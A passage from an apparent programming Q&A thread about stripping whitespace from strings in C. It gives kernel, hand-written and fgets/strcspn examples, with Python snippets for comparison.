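def strip_bytes(s: bytes) -> bytes:
    # Trailing scan: walk back from the end until a non-white byte or the
    # start of the string is reached (in C, the '\0' is written here).
    end = len(s)
    while end > 0 and s[end - 1] in WHITESPACE:
        end -= 1
    # Leading scan: walk forward to the first non-white byte (in C, the
    # remainder is then memmove'd to the start of the buffer).
    start = 0
    while start < end and s[start] in WHITESPACE:
        start += 1
    return s[start:end]

print(strip_bytes(b"  \t x y z \n"))
```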
There is no standard C implementation for a strip() or trim() function. That said, here's the one included in the Linux kernel:
char *strstrip(char *s)
{
    size_t size;
    char *end;
    size = strlen(s);
    if (!size)
        return s;
    end = s + size - 1;
    while (end >= s && isspace(*end))
        end--;
    *(end + 1) = '\0';
    while (*s && isspace(*s))
        s++;
    return s;
}
If you want to remove, in place, the final newline on a line, you can use this snippet:
size_t s = strlen(buf);
if (s && (buf[s-1] == '\n')) buf[--s] = 0;
To faithfully mimic Python's str.strip([chars]) method (the way I interpreted its workings), you need to allocate space for a new string, fill the new string, and return it. When you no longer need the stripped string, you must free its memory to avoid a leak.
Or you can use C pointers and modify the initial string and achieve a similar result.
Suppose your initial string is "____forty two____\n" and you want to strip all underscores and the '\n'
____forty two____\n
^ ptr
If you change ptr to point at the 'f' and replace the first '_' after "two" with a '\0', the result is the same as Python's "____forty two____\n".strip("_\n"):
____forty two\0___\n
    ^ ptr
Again, this is not the same as Python. The string is modified in place, there's no 2nd string and you cannot revert the changes (the original string is lost).
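For comparison, this is the Python behaviour that the pointer trick approximates. The snippet uses only the built-in str.strip(); it shows that the chars argument is treated as a set of characters and that the original string is left untouched.

```python
original = "____forty two____\n"
stripped = original.strip("_\n")

print(repr(stripped))
print(repr(original))  # unchanged: Python strings are immutable

# The argument is a set of characters, not a prefix or suffix to match.
mixed = "\n_\n__x_\n".strip("_\n")
print(repr(mixed))
```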
I wrote C code to implement this function. I also wrote a few trivial tests to make sure my function does sensible things.
This function writes to a buffer you provide, and should never write past the end of the buffer, so it should not be prone to buffer overflow security issues.
Note: only Test() uses stdio.h, so if you just need the function, you only need to include ctype.h (for isspace()) and string.h (for strlen()).
// strstrip.c -- implement white space stripping for a string in C
//
// This code is released into the public domain.
//
// You may use it for any purpose whatsoever, and you don't need to advertise
// where you got it, but you aren't allowed to sue me for giving you free
// code; all the risk of using this is yours.
#include <ctype.h>
#include <stdio.h>
#include <string.h>
// strstrip() -- strip leading and trailing white space from a string
//
// Copies from sIn to sOut, writing at most lenOut characters.
//
// Returns number of characters in returned string, or -1 on an error.
// If you get -1 back, then nothing was written to sOut at all.
int
strstrip(char *sOut, unsigned int lenOut, char const *sIn)
{
char const *pStart, *pEnd;
unsigned int len;
char *pOut;
// if there is no room for any output, or a null pointer, return error!
if (0 == lenOut || !sIn || !sOut)
return -1;
pStart = sIn;
pEnd = sIn + strlen(sIn) - 1;
// skip any leading whitespace
while (*pStart && isspace(*pStart))
++pStart;
// skip any trailing whitespace
while (pEnd >= sIn && isspace(*pEnd))
--pEnd;
pOut = sOut;
len = 0;
// copy into output buffer
while (pStart <= pEnd && len < lenOut - 1)
{
*pOut++ = *pStart++;
++len;
}
// ensure output buffer is properly terminated
*pOut = '\0';
return len;
}
void
Test(const char *s)
{
int len;
char buf[1024];
len = strstrip(buf, sizeof(buf), s);
if (!s)
s = "**null**"; // don't ask printf to print a null string
if (-1 == len)
*buf = '\0'; // don't ask printf to print garbage from buf
printf("Input: \"%s\" Result: \"%s\" (%d chars)\n", s, buf, len);
}
int main(void)
{
Test(NULL);
Test("");
Test(" ");
Test(" ");
Test("x");
Test(" x");
Test(" x ");
Test(" x y z ");
Test("x y z");
}
This potential 'solution' is by no means as complete or thorough as the others presented here. It is for my own toy project in C, a text-based adventure game that I'm working on with my 14-year-old son. If you're using fgets(), then strcspn() may just work for you as well. The sample code below is the beginning of an interactive console-based loop.
#include <stdio.h>
#include <string.h> // for strcspn()
int main(void)
{
char input[64];
puts("Press <q> to exit..");
do {
printf("> ");
if (!fgets(input, sizeof input, stdin)) break; // fgets() captures '\n'; stop on EOF
input[strcspn(input, "\n")] = 0; // replaces '\n' with 0
if (input[0] == '\0') continue;
printf("You entered '%s'\n", input);
} while (strcmp(input,"q")!= 0); // returns 0 (false) when input = "q"
puts("Goodbye!");
return 0;
}
